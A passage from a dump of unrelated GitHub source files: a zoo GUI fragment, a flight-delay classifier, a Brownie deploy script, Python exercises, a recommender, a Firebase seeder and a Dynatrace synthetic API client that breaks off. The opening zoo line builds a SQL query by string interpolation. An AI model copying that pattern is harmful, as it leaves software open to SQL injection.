mycursor.execute(\"SELECT Start_date FROM Employee WHERE EmployeeID = %s\"%eid)\n result = mycursor.fetchall()\n startdateMessage = Label(homePage,text=\"You've been working here since %s\"%result[0])\n startdateMessage.grid(row=4,column=0,sticky=N+S+W+E,padx=5,pady=10)","repo_name":"MackenzieBowal/ZooDatabase_Project","sub_path":"gui/zookeeper.py","file_name":"zookeeper.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1116512218","text":"import pandas as pd\nimport math\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nimport numpy as np\nimport pickle\n\ndf=pd.read_csv('C:FlightData.csv')\n\ndf = df.drop('Unnamed: 25', axis=1)\n\ndf = df[[\"MONTH\", \"DAY_OF_MONTH\", \"DAY_OF_WEEK\", \"ORIGIN\", \"DEST\", \"CRS_DEP_TIME\", \"ARR_DEL15\"]]\n\ndf = df.fillna({'ARR_DEL15': 1})\n\nfor index, row in df.iterrows():\n df.loc[index, 'CRS_DEP_TIME'] = math.floor(row['CRS_DEP_TIME'] / 100)\n\ndf = pd.get_dummies(df, columns=['ORIGIN', 'DEST'])\n\ntrain_x, test_x, train_y, test_y = train_test_split(df.drop('ARR_DEL15', axis=1), df['ARR_DEL15'], test_size=0.2, random_state=42)\n\nmodel = RandomForestClassifier(random_state=13)\nmodel.fit(train_x, train_y)\n\ndef predict_delay(departure_date_time, origin, destination):\n from datetime import datetime\n\n try:\n departure_date_time_parsed = datetime.strptime(departure_date_time, '%d/%m/%Y %H:%M:%S')\n except ValueError as e:\n return 'Error parsing date/time - {}'.format(e)\n\n month = departure_date_time_parsed.month\n day = departure_date_time_parsed.day\n day_of_week = departure_date_time_parsed.isoweekday()\n hour = departure_date_time_parsed.hour\n\n origin = origin.upper()\n destination = destination.upper()\n\n input = [{'MONTH': month,\n 'DAY': day,\n 'DAY_OF_WEEK': day_of_week,\n 'CRS_DEP_TIME': hour,\n 'ORIGIN_ATL': 1 if origin == 'ATL' else 0,\n 'ORIGIN_DTW': 1 if origin == 'DTW' else 0,\n 'ORIGIN_JFK': 1 if origin == 'JFK' else 0,\n 'ORIGIN_MSP': 1 if origin == 'MSP' else 0,\n 'ORIGIN_SEA': 1 if origin == 'SEA' else 0,\n 'DEST_ATL': 1 if destination == 'ATL' else 0,\n 'DEST_DTW': 1 if destination == 'DTW' else 0,\n 'DEST_JFK': 1 if destination == 'JFK' else 0,\n 'DEST_MSP': 1 if destination == 'MSP' else 0,\n 'DEST_SEA': 1 if destination == 'SEA' else 0 }]\n\n return model.predict_proba(pd.DataFrame(input))[0][0]\n\n#pickle.dump(regressor, open('model.pkl','wb'))\n\nwith open('model.pkl', 'wb') as f:\n pickle.dump(model, f)\n\nwith open('model.pkl', 'rb') as f:\n model = pickle.load(f)\n\n# Loading model to compare the results\n#model = pickle.load(open('model.pkl','rb'))\n#print(model.predict_delay([[2, 9, 6]]))\n","repo_name":"rohit523/ATC","sub_path":"Model/Flight Delay/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23025887190","text":"from brownie import FundMe, config,network, MockV3Aggregator\nfrom scripts.helpful_script import (get_account , deploy_mock,local_blockchain_environment,LOCAL_MAINNET_FORK_ENVIRONMENT)\n\n\n# ifI add account through terminal then it is added in brownie not acces through accouts[0], \n# account = account.load()\n\ndef fund_me():\n account = get_account()\n # if network.show_active()!=\"development\":\n # since ganache is not a development network but its a local network\n \n if network.show_active() not in local_blockchain_environment:\n price_feed = config[\"networks\"][network.show_active()][\n \"eth_usd_price_feed\"\n ]\n else:\n deploy_mock()\n price_feed = MockV3Aggregator[-1].address\n\n #price feed as a argument is needed to pass becuase every testnet has different rpicefeed address\n # this price feed aggregator contain all the information about the rate of eth vs dollar\n #interfaces allow us to itnereact eith external real time event\n fund_me = FundMe.deploy(price_feed , {\"from\": account} , publish_source = config[\"networks\"][network.show_active()].get(\"verify\"))\n return fund_me\n\n\n'''API not set for this network when try to deploy on ganache because etherscan dont know about ganache'''\ndef main():\n fund_me()","repo_name":"Amiteshgupta22/Brownie_fundme","sub_path":"scripts/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15863369285","text":"def printSeparator(title):\r\n\tprint('~~~~~~~~~ ' + title + ' ~~~~~~~~~~~~~~~~')\r\n\tpass\r\n\r\nprintSeparator('Any number of arguments')\r\n# Accepts variable number of arguments\r\ndef listStrings(*strings):\r\n\ti = 0\r\n\t#iterate through the tuple\r\n\tfor s in strings:\r\n\t\ti += 1\r\n\t\tprint(i, ' ', s)\r\n\r\n\r\nlistStrings('Guru', 1, 'Sarath', 'CAR', 'LOVE', 'BILLIONAIR', 'HEALTHY', 'PRIYANKA', \"FAMILY\", 'Business')\r\n\r\nprintSeparator('Map function')\r\n\r\ndef square(x):\r\n\treturn x**2\r\n\r\n# Using squares to create list of squares\r\nsquares = map(square, [1,2,3])\r\nprint(squares)\r\nfor s in squares:\r\n\tprint(s)\r\n\r\nprintSeparator('Lambda Expressions')\r\nf = lambda x : x*x*x\r\nf2 = lambda x,y: x+y\r\n\r\nprint(f(3))\r\nprint(f2(3,4))\r\n\r\nclass Numbers:\r\n\t\r\n\tNums = list()\r\n\r\n\tdef __init__(self,*tupleX):\r\n\t\tfor n in tupleX:\r\n\t\t\tself.Nums.extend([n])\r\n\r\n\tdef listNums(self):\r\n\t\tprint(self.Nums)\r\n\r\n\r\nobjNums = Numbers(1,2,3,4,5)\r\nobjNums.listNums()","repo_name":"gurusarath1/Snippets","sub_path":"Python_Learning/Python_Learning.py","file_name":"Python_Learning.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70579746667","text":"# leetcode 96, 中等, 动态规划的思想\n# 给定一个整数 n,求以 1 ... n 为节点组成的二叉搜索树有多少种?\n#\n# 示例:\n#\n# 输入: 3\n# 输出: 5\n# 解释:\n# 给定 n = 3, 一共有 5 种不同结构的二叉搜索树:\n#\n# 1 3 3 2 1\n# \\ / / / \\ \\\n# 3 2 1 1 3 2\n# / / \\ \\\n# 2 1 2 3\nimport math\n\n\nclass Solution:\n def numTrees_1(self, n:int)->int:\n \"\"\"\n 利用动态规划的思想从底向上解答问题。\n 假设有m种二叉树,m = 左子树的种类 * 右子树的种类\n 因此可以形成一个表达式num(n) = num(j) * num(n-j-1)\n 注意当根节点为空时,也是一种二叉树,\n :param n:\n :return:\n \"\"\"\n re = [0 for i in range(0, n+1)] # 注意这里是n+1,\n re[0] = 1 # 0时算一个树\n re[1] = 1\n for i in range(2, n+1):\n for j in range(0, i):\n re[i] = re[i] + re[j] * re[i-j-1]\n return re[n]\n\n def numTrees_2(self, n:int)->int:\n \"\"\"\n 直接利用数学公式,一个有n个节点的二叉树,一共有:\n (2n)!/((n+1)!*n!)\n :param n:\n :return:\n \"\"\"\n return math.factorial(2*n)//(math.factorial(n+1)*math.factorial(n))\n\n\nsol = Solution()\nprint(sol.numTrees_2(5))\n\n\n\n\n","repo_name":"liying123456/python_leetcode","sub_path":"tree/96_numTrees.py","file_name":"96_numTrees.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39265086154","text":"# Import numpy\nimport numpy as np\n\n# Compute number of data points: n_data\nn_data = len(versicolor_petal_length)\n\n# Number of bins is the square root of number of data points: n_bins\nn_bins = np.sqrt(n_data)\n\n# Convert number of bins to integer: n_bins\nn_bins = int(n_bins)\n\n# Plot the histogram\n_ = plt.hist(versicolor_petal_length, bins=n_bins)\n\n# Label axes\n_ = plt.xlabel('petal length (cm)')\n_ = plt.ylabel('count')\n\n# Show histogram\nplt.show()\n\n##***************************************************************\n##***************************************************************\n##***************************************************************\n\ndef ecdf(data):\n \"\"\"Compute ECDF for a one-dimensional array of measurements.\"\"\"\n\n # Number of data points: n\n n = len(data)\n\n\n # x-data for the ECDF: x\n x = np.sort(data)\n\n # y-data for the ECDF: y\n y = np.arange(1, n+1) / n\n\n return x, y\n","repo_name":"michmoca/proyecto-estadisticautn","sub_path":"codigos-implementar.py","file_name":"codigos-implementar.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74759944428","text":"import firebase_admin\r\nfrom firebase_admin import credentials\r\nfrom firebase_admin import db\r\n\r\ncred = credentials.Certificate(\"serviceAccountKey.json\")\r\nfirebase_admin.initialize_app(cred, {\r\n 'databaseURL':\"https://faceauthenticator-570df-default-rtdb.firebaseio.com/\"\r\n})\r\n\r\nref = db.reference('Students')\r\n\r\ndata = {\r\n \"101\" : {\r\n \"name\" : \"A R Kaarthikeyan\",\r\n \"major\" : \"CSE\",\r\n \"starting_year\" : 2020,\r\n \"total_attendance\" : 5,\r\n \"year\" : 3,\r\n \"standing\" : \"G\",\r\n \"last_attendance_time\": \"2023-03-28 12:30:58\"\r\n },\r\n \"102\" : {\r\n \"name\" : \"Elon Musk\",\r\n \"major\" : \"CSE\",\r\n \"starting_year\" : 2020,\r\n \"total_attendance\" : 4,\r\n \"year\" : 3,\r\n \"standing\" : \"G\",\r\n \"last_attendance_time\": \"2023-03-28 12:30:58\"\r\n },\r\n \"103\" : {\r\n \"name\" : \"Ratan Tata\",\r\n \"major\" : \"Economics\",\r\n \"starting_year\" : 2020,\r\n \"total_attendance\" : 8,\r\n \"year\" : 4,\r\n \"standing\" : \"G\",\r\n \"last_attendance_time\": \"2023-03-28 12:30:58\"\r\n },\r\n \"104\" : {\r\n \"name\" : \"Steve Jobs\",\r\n \"major\" : \"IT\",\r\n \"starting_year\" : 2020,\r\n \"total_attendance\" : 3,\r\n \"year\" : 3,\r\n \"standing\" : \"G\",\r\n \"last_attendance_time\": \"2023-03-28 12:30:58\"\r\n },\r\n \r\n}\r\n\r\nfor key,value in data.items():\r\n ref.child(key).set(value)","repo_name":"arkaarthikeyan23/Face-Authenticator","sub_path":"addDataToDB.py","file_name":"addDataToDB.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5286281288","text":"\ndef haveZeros(x):\n tmp = x\n while tmp > 0:\n val = tmp%10\n if val == 0:\n return False\n tmp = tmp//10\n return True\n\ndef sumOfdigits(x):\n sum = 0\n tmp = x\n while tmp > 0:\n sum += tmp%10\n tmp = tmp//10\n return sum\n\ndef productOfDigits(x):\n pr = 1\n tmp = x\n while tmp > 0:\n pr *= tmp%10\n tmp = tmp//10\n return pr\n\ndef divisibleNumbers(n):\n flag = True\n for m in range(1,n+1):\n if n%m == 0:\n flag = haveZeros(m)\n flag = (sumOfdigits(m)>= productOfDigits(m))\n if flag:\n return m\n\n return -1\n\nprint(divisibleNumbers(32))","repo_name":"krzychsol/Algorithms-and-Data-Structures","sub_path":"Others/Hackerrank/DivisibleNumbers.py","file_name":"DivisibleNumbers.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41885910116","text":"import argparse\nimport datetime as dt\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as md\n\n\ndef proces_logs(args):\n\n # Speed data\n process_sources(['speed-DST810', 'speed-H5000-BS', 'speed-H5000-CPU'],\n ['sow', 'sow-sog'],\n args.work_dir)\n\n # Wind data\n process_sources(['wind-H5000-MHU', 'wind-WS310', 'wind-H5000-CPU'],\n ['awa', 'aws', 'twa', 'tws'],\n args.work_dir)\n\n # Heading data\n process_sources(['heading-Precision-9', 'heading-ZG100'],\n ['mag', 'cog', 'mag-cog'],\n args.work_dir)\n\n\ndef process_sources(sources, values, work_dir):\n vals = read_values(sources, values, work_dir)\n plot_values(sources, values, vals)\n\n\ndef plot_values(sources, values, vals):\n for value in values:\n plt.figure()\n for source in sources:\n label = source\n val = np.array(vals[source][value])\n timestamps = np.array(vals[source][value + '-time']) / 1000.0\n dates = [dt.datetime.fromtimestamp(ts) for ts in timestamps]\n\n if np.isnan(val).all():\n continue\n\n plt.xticks(rotation=25)\n ax = plt.gca()\n xfmt = md.DateFormatter('%Y-%m-%d %H:%M:%S')\n ax.xaxis.set_major_formatter(xfmt)\n\n if '-' in value:\n mean = np.nanmean(val)\n std = np.nanstd(val)\n label += f' {mean:.2f} +/- {std:.2f}'\n plt.plot(dates, val, label=label)\n\n plt.legend()\n plt.title(value)\n plt.grid(True)\n\n\ndef read_values(sources, values, work_dir):\n vals = {}\n for source in sources:\n\n vals[source] = {}\n vals[source]['time'] = []\n for value in values:\n vals[source][value] = []\n vals[source][value + '-time'] = []\n\n csv_file_name = work_dir + '/' + source + '-instr.csv'\n with open(csv_file_name, 'r') as f:\n print(f'Reading {csv_file_name}')\n for line in f:\n t = line.split(',')\n for value in values:\n time_stamp_ms = int(t[0])\n if '-' in value:\n exp = value.split('-') # e.g. mag-cog compute difference between two values\n op1 = exp[0]\n op2 = exp[1]\n else:\n op1 = None\n op2 = None\n for i in range(len(t)-1):\n v = t[i + 1]\n if t[i] == value:\n val = float(v) if len(v) > 0 else np.nan\n if op1 is not None and t[i] == op1:\n val1 = float(v) if len(v) > 0 else np.nan\n if op2 is not None and t[i] == op2:\n val2 = float(v) if len(v) > 0 else np.nan\n\n if op1 is not None and op2 is not None:\n diff = val1 - val2\n if diff > 180:\n diff -= 360\n elif diff < -180:\n diff += 360\n vals[source][value].append(diff)\n else:\n vals[source][value].append(val)\n\n vals[source][value + '-time'].append(time_stamp_ms)\n\n print(f'Processed {len(vals[source][values[0]])} values')\n return vals\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(fromfile_prefix_chars='@')\n parser.add_argument(\"--work-dir\", help=\"Working directory\", default='/private/tmp/ydn-csv')\n\n proces_logs(parser.parse_args())\n\n plt.show()\n","repo_name":"sergei/sailvue","sub_path":"scripts/plot_instr.py","file_name":"plot_instr.py","file_ext":"py","file_size_in_byte":3767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40172764948","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 23 14:50:43 2021\n\n@author: Ouyang\n\"\"\"\n\nimport copy\nimport numpy as np\nimport pandas as pd\nimport genMatrix as gM\n\ndef simMat(m, itemCF = False, simMethod = \"cosine\"):\n mat = copy.deepcopy(m)\n \n #为了方便计算相似度,把无打分的位置记作0\n mat[mat==-1] = 0\n \n #若为itemCF,只需转置矩阵即可\n if itemCF==True:\n mat = mat.T\n \n #初始化相似度矩阵 \n nRow = np.shape(mat)[0]\n nCol = np.shape(mat)[1] \n \n #求行列打分均值(去掉未打分的格子),并找出从未打分的用户或商品\n noDataRow = [\"\"]\n noDataCol = [\"\"]\n mRow = pd.Series([0.0] * nRow, index = mat.index) #储存行均值(浮点型)\n for i in range(0, nRow):\n ite = mat.iloc[i]\n if sum(ite!=0)==0: #从未打分\n noDataRow.append(mat.index[i])\n else:\n #下面的判断是防止出现所有评分相等,减去均值等于0的情况。此时不应算均值\n if len(ite.unique())>2 or (len(ite.unique())==2 & sum(ite==0)==0):\n mRow[i] = np.mean(ite[ite!=0])\n \n mCol = pd.Series([0.0] * nCol, index = mat.columns) #储存列均值\n for j in range(0, nCol):\n ite = mat.iloc[:, j] #当前列\n if sum(ite!=0)==0: #从未被打分\n noDataCol.append(mat.columns[j])\n else:\n if len(ite.unique())>2 or (len(ite.unique())==2 & sum(ite==0)==0):\n mCol[j] = np.mean(ite[ite!=0])\n \n #删除无评分的行列 \n del noDataRow[0]\n del noDataCol[0]\n mat = mat.drop(index = noDataRow)\n mat = mat.drop(columns = noDataCol)\n mRow = mRow.drop(index = noDataRow)\n mCol = mCol.drop(index = noDataCol)\n \n #计算有评分的相似度矩阵(这是个对称矩阵,且对角元素无意义,设为0)\n nRow = np.shape(mat)[0]\n nCol = np.shape(mat)[1] \n simMat = np.zeros([nRow, nRow])\n for i in range(0, nRow):\n simMat[i, i] = 0\n \n for j in range(i + 1, nRow):\n a = np.array(mat.iloc[i])\n b = np.array(mat.iloc[j])\n \n #下面使用相关系数打分,注意没有打分(等于0)的格子不需要纠偏\n if simMethod==\"pearson_same\":\n a[a!=0] = a[a!=0] - np.array([mRow[i]] * sum(a!=0))\n b[b!=0] = b[b!=0] - np.array([mRow[j]] * sum(b!=0))\n elif simMethod==\"pearson_alter\":\n a[a!=0] = a[a!=0] - mCol[a!=0]\n b[b!=0] = b[b!=0] - mCol[b!=0]\n \n #计算向量余弦值\n simMat[i, j] = sum(a * b) / (np.linalg.norm(a) * np.linalg.norm(b)) \n simMat[j, i] = simMat[i, j]\n \n #继承mat的用户名和商品名 \n simMat = pd.DataFrame(simMat, index = mat.index, columns = mat.index)\n \n if itemCF==True:\n return simMat, noDataCol, noDataRow\n else:\n return simMat, noDataRow, noDataCol\n\n\ndef CF(m, uID, top = 5, rec = 5, itemCF = False, simMethod = \"cosine\",\n simBound = 0, positive = 0):\n [sMat, ndU, ndI] = simMat(m, itemCF, simMethod)\n mat = copy.deepcopy(m)\n mat[mat==-1] = 0\n \n #初始化推荐数据框,每行代表一个用户,列从左至右依次代表推荐物品\n recMat = pd.DataFrame(np.full([len(uID), rec], \"\"), index = uID,\n columns = range(0, rec))\n \n if itemCF==False:\n for i in range(0, len(uID)):\n #如果用户没有购买任何商品,提示无数据\n if uID[i] in ndU:\n recMat.loc[uID[i], 0] = \"no user data!\"\n else:\n #寻找最相似的top个用户\n simU = [\"\"] * top\n simRow = copy.deepcopy(sMat.loc[uID[i]])\n for j in range(0, top):\n if simRow.max()>simBound: #相似度至少要大于simBound\n simU[j] = simRow.idxmax() #标记用户名称\n simRow[simRow.idxmax()] = simBound\n \n if simU[0]==\"\": #此时无法提供任何推荐\n recMat.loc[uID[i], 0] = \"no similar user\"\n else:\n #基于最相似的用户,预测目标用户所有未购买商品的评分\n new = copy.deepcopy(mat.loc[uID[i]]) #new是新的打分\n new[new!=0] = -2 #已经买过的商品不再打分\n \n #j遍历所有打分格子,k遍历最相似的用户\n simRow = copy.deepcopy(sMat.loc[uID[i]])\n for j in range(0, len(new)):\n if new[j]==0:\n up = 0\n down = 0\n \n #尝试推荐rec个商品\n for k in range(0, top):\n if simU[k]!=\"\":\n up = up + simRow[simU[k]] * \\\n mat.loc[simU[k]][j]\n down = down + simRow[simU[k]]\n new[j] = up / down\n \n #尝试推荐rec个最高评分的商品\n for j in range(0, rec):\n if new.max()>simBound:\n recMat.loc[uID[i], j] = new.idxmax() + \" \" + \\\n str(new.max())\n new[new.idxmax()] = -2\n else:\n recMat.loc[uID[i], j] = \"lower than simBound\"\n break\n \n else:\n for i in range(0, len(uID)): \n if uID[i] in ndU:\n recMat.loc[uID[i], 0] = \"no user data!\"\n else:\n #寻找用户i的正反馈商品表\n matRow = copy.deepcopy(mat.loc[uID[i]])\n pos = matRow[matRow>positive].index\n \n if len(pos)==0: #如果没有正反馈商品,则无法提供任何推荐\n recMat.loc[uID[i], 0] = \"no positive feedback\"\n else:\n #计算用户i所有未购买商品与正反馈商品的相似度\n new = copy.deepcopy(matRow)\n new[new!=0] = -2\n \n #j遍历所有打分格子,k遍历所有正反馈商品\n for j in range(0, len(new)):\n if new[j]==0 and (new.index[j] not in ndI):\n for k in range(0, len(pos)):\n new[j] = new[j] + matRow[pos[k]] * \\\n sMat.at[new.index[j], pos[k]]\n \n #找出相似度最高的rec个商品\n for j in range(0, rec):\n if new.max()>simBound:\n recMat.at[uID[i], j] = new.idxmax() + \" \" + \\\n str(new.max())\n new[new.idxmax()] = simBound\n else:\n recMat.at[uID[i], j] = \"lower than simBound\"\n break\n \n return recMat, sMat\n \n\n \nmat = gM.genMatrix(10, 10, [1, 10])\n\nuID = mat.index[[2, 4, 9]]\n\n[recMat, sMat] = CF(mat, uID, itemCF = True, simMethod = \"pearson_same\", \n positive = 5)\n\n#mat要求:用户和商品名称不重复,无打分项设定为-1,打分区间大于0 \n\n \n \n \n \n \n\n\n","repo_name":"OyCraft/big-data-analysis","sub_path":"extra/CF.py","file_name":"CF.py","file_ext":"py","file_size_in_byte":7782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20382631322","text":"#!/usr/bin/python3\n\"\"\"simple function to add two numbers\"\"\"\n\n\ndef add_integer(a, b=98):\n \"\"\"add a with b\n\n Args:\n a (int): first number\n b (int): second number with default value 98\n\n Raises:\n TypeError: if a or b is not int and not float\n \"\"\"\n\n if not isinstance(a, int) and not isinstance(a, float):\n raise TypeError(\"a must be an integer\")\n if not isinstance(b, int) and not isinstance(b, float):\n raise TypeError(\"b must be an integer\")\n\n return int(a) + int(b)\n","repo_name":"M1-Elmasry/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15942780779","text":"from random import randrange\nfrom re import split\n\nfrom src.utils.Singleton import Singleton\n\n\nclass DataSet(metaclass=Singleton):\n data_set = []\n results = []\n\n def __init__(self, split_p=.7):\n self.split = split_p\n\n # Knuth-Fisher-Yates algorithm\n def randomize_set(self):\n for old_index in range(len(self.data_set)):\n new_index = randrange(old_index, len(self.data_set))\n if old_index == new_index:\n continue\n\n self.data_set[old_index], self.data_set[new_index] = self.data_set[new_index], self.data_set[old_index]\n self.results[old_index], self.results[new_index] = self.results[new_index], self.results[old_index]\n\n def get_data_sets(self):\n \"\"\" :return: training_set, verification_set, training_result, verification_result \"\"\"\n\n split_place = int(len(self.data_set) * self.split)\n return self.data_set[:split_place], self.data_set[split_place:], \\\n self.results[:split_place], self.results[split_place:]\n\n def load_data(self, file_name):\n self.data_set = []\n self.results = []\n\n with open(file_name, 'r') as f:\n for line in f.readlines():\n if line[0] != '@':\n line = line.replace('\\n', '')\n values = split(\"[,;]\", line)\n\n self.data_set.append([float(value) for value in values[:-1]])\n self.results.append(values[-1:][0])\n\n # self.data_set = MinMaxScaler(feature_range=(0, 1)).fit_transform(self.data_set)\n","repo_name":"konkath/SupervisedClassifiers","sub_path":"src/utils/DataSet.py","file_name":"DataSet.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36380034329","text":"import os\nimport sys\nimport logging\nimport datetime\nimport configparser\nimport ast\nimport time\nimport collections\nimport json\nimport copy\nimport urllib\nimport re\nimport string\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders\nfrom email.utils import COMMASPACE\n\nimport requests\nimport pytz\nimport tzlocal\nimport tqdm\nimport xlsxwriter\n\n\nclass cls_config(object):\n def __init__(self, personality=None):\n personality = (\n personality\n if personality\n else {\"credentials\": {\"tenant\": \"\", \"api_token\": \"\", \"proxy\": \"\"}}\n )\n _base = os.path.dirname(os.path.realpath(__file__))\n # setup logging\n log_path = os.path.join(_base, \"logs\")\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n log_file = os.path.join(log_path, \"error.log\")\n logging.basicConfig(\n filename=log_file,\n filemode=\"a\",\n format=\"%(asctime)s %(levelname)-s: %(message)s\",\n level=logging.WARNING,\n datefmt=\"%d-%b-%y %H:%M:%S\",\n )\n # setup output path\n self.output_path = os.path.join(_base, \"output\")\n if not os.path.exists(self.output_path):\n os.mkdir(self.output_path)\n # setup config\n config_path = os.path.join(_base, \"config\")\n if not os.path.exists(config_path):\n os.mkdir(config_path)\n config_file = os.path.join(config_path, \"config\")\n\n self.config = configparser.ConfigParser(allow_no_value=True)\n self.config.optionxform = str\n if not os.path.isfile(config_file):\n self.config.read_dict(personality)\n with open(config_file, \"w\") as cfigfile:\n self.config.write(cfigfile)\n with open(\n os.path.join(config_path, \"common_timezones.txt\"), \"w\"\n ) as common_timezones:\n for timezone in pytz.common_timezones:\n common_timezones.write(\"{}\\n\".format(timezone))\n logging.error(\"No config found - created default config\")\n print(\"No config found - created default config\")\n sys.tracebacklimit = -1\n sys.exit()\n else:\n self.config.read(config_file)\n\n def config_to_dict(self, section):\n config_dict = {}\n if self.config.has_section(section):\n for option in self.config.options(section):\n value = self.config.get(section, option)\n if len(value) > 0:\n if value.lower() in [\"true\"]:\n value = True\n elif value.lower() in [\"false\"]:\n value = False\n config_dict[option] = value\n return config_dict\n\n\nclass cls_synth(object):\n def __init__(self, config=None):\n self._sleep_seconds = 0.5000\n self.output_path = config.output_path\n credentials = config.config_to_dict(\"credentials\")\n self.tenant = credentials.get(\"tenant\", None)\n self.api_token = credentials.get(\"api_token\", None)\n self.proxy = credentials.get(\"proxy\", None)\n if self.proxy:\n self.proxy = ast.literal_eval(self.proxy)\n\n if self.tenant and self.api_token:\n self.tenant = self.tenant[:-1] if self.tenant.endswith(\"/\") else self.tenant\n else:\n print(\"Credentials tenant/api_token not set in config\")\n logging.error(\"Credentials tenant/api_token not set in config\")\n sys.tracebacklimit = -1\n sys.exit()\n\n report = config.config_to_dict(\"report\")\n self.time_zone = report.get(\"time_zone\", tzlocal.get_localzone().zone)\n\n def _rest_call_(self, method, api_url, params=None, data=None):\n if (self.tenant is None) or (self.api_token is None):\n print(\"Tenant and/or api token not set, check config file\")\n logging.error(\"Tenant and/or api token not set, check config file\")\n sys.tracebacklimit = 0\n sys.exit()\n response = None\n headers = {\n \"Authorization\": \"Api-Token \" + self.api_token,\n \"Accept\": \"application/json\",\n \"Content-Type\": \"application/json\",\n }\n url = self.tenant + api_url\n try:\n response = requests.request(\n method=method,\n url=url,\n headers=headers,\n params=params,\n json=data,\n verify=True,\n proxies=self.proxy,\n )\n response.raise_for_status()\n if response.status_code in [\n requests.codes.no_content,\n requests.codes.created,\n ]:\n return True\n if response.status_code == requests.codes.ok:\n return response.json()\n except requests.exceptions.HTTPError:\n if response.status_code == requests.codes.too_many_requests:\n now = datetime.datetime.now()\n reset_time = datetime.datetime.fromtimestamp(\n int(response.headers[\"X-RateLimit-Reset\"]) / 1000000\n )\n sleep_seconds = (reset_time - now).seconds + 1\n msg = (\n \"too_many_requests, sleeping: \"\n + str(sleep_seconds)\n + \" seconds, reset time: \"\n )\n msg += reset_time.strftime(\"%d-%b-%Y %H:%M\")\n logging.warning(msg)\n time.sleep(sleep_seconds)\n self._rest_call_(method, api_url, params, data)\n else:\n err_msg = \"(\" + str(response.status_code) + \") \" + response.reason\n err_msg = err_msg + \" [requestURL: \" + response.request.url + \"]\"\n err_msg = err_msg + \" Response text: \" + response.text\n logging.error(err_msg)\n\n except (\n requests.exceptions.RequestException,\n requests.exceptions.ConnectionError,\n requests.exceptions.URLRequired,\n requests.exceptions.TooManyRedirects,\n requests.exceptions.Timeout,\n ) as no_response_errs:\n logging.error(no_response_errs)\n return False\n\n @staticmethod\n def monitor_payload():\n return {\n \"frequencyMin\": 0,\n \"anomalyDetection\": {\n \"outageHandling\": {\n \"globalOutage\": False,\n \"localOutage\": False,\n \"localOutagePolicy\": {\"affectedLocations\": 1, \"consecutiveRuns\": 1},\n },\n \"loadingTimeThresholds\": {\"enabled\": False, \"thresholds\": []},\n },\n \"type\": \"BROWSER\",\n \"name\": None,\n \"locations\": [],\n \"enabled\": False,\n \"script\": None,\n \"tags\": [],\n \"manuallyAssignedApps\": [],\n \"keyPerformanceMetrics\": {\"loadActionKpm\": None, \"xhrActionKpm\": None},\n }\n\n @staticmethod\n def audit_logs_params():\n return {\n \"nextPageKey\": None,\n \"pageSize\": None,\n \"filter\": None,\n \"from\": None,\n \"to\": None,\n \"sort\": None,\n }\n\n @staticmethod\n def metrics_query_params():\n return {\n \"nextPageKey\": None,\n \"pageSize\": None,\n \"metricSelector\": None,\n \"resolution\": None,\n \"from\": None,\n \"to\": None,\n \"entitySelector\": None,\n }\n\n @staticmethod\n def metrics_params():\n return {\n \"nextPageKey\": None,\n \"pageSize\": None,\n \"metricSelector\": None,\n \"fields\": None,\n }\n\n @staticmethod\n def usql_params():\n return {\n \"query\": None,\n \"startTimestamp\": None,\n \"endTimestamp\": None,\n \"explain\": False,\n }\n\n @staticmethod\n def problems_params():\n return {\n \"relativeTime\": None,\n \"startTimestamp\": None,\n \"endTimestamp\": None,\n \"status\": None,\n \"impactLevel\": None,\n \"severityLevel\": None,\n \"tag\": None,\n \"expandDetails\": True,\n }\n\n @staticmethod\n def monitors_params():\n return {\n \"managementZone\": None,\n \"tag\": None,\n \"location\": None,\n \"assignedApps\": None,\n \"type\": None,\n \"enabled\": None,\n \"credentialId\": None,\n \"credentialOwner\": None,\n }\n\n @staticmethod\n def locations_params():\n return {\"cloudPlatform\": None, \"type\": None}\n\n @staticmethod\n def timeseries_payload():\n return {\n \"timeseriesId\": None,\n \"includeData\": True,\n \"aggregationType\": None,\n \"startTimestamp\": None,\n \"endTimestamp\": None,\n \"predict\": False,\n \"relativeTime\": None,\n \"queryMode\": None,\n \"entities\": [],\n \"tag\": [],\n \"filters\": {},\n \"percentile\": None,\n \"includeParentIds\": False,\n \"considerMaintenanceWindowsForAvailability\": False,\n }\n\n @staticmethod\n def single_url_browser_script(monitor_url, validation_text=None):\n configuration = {\n \"device\": {\"deviceName\": \"Desktop\", \"orientation\": \"landscape\"}\n }\n events = 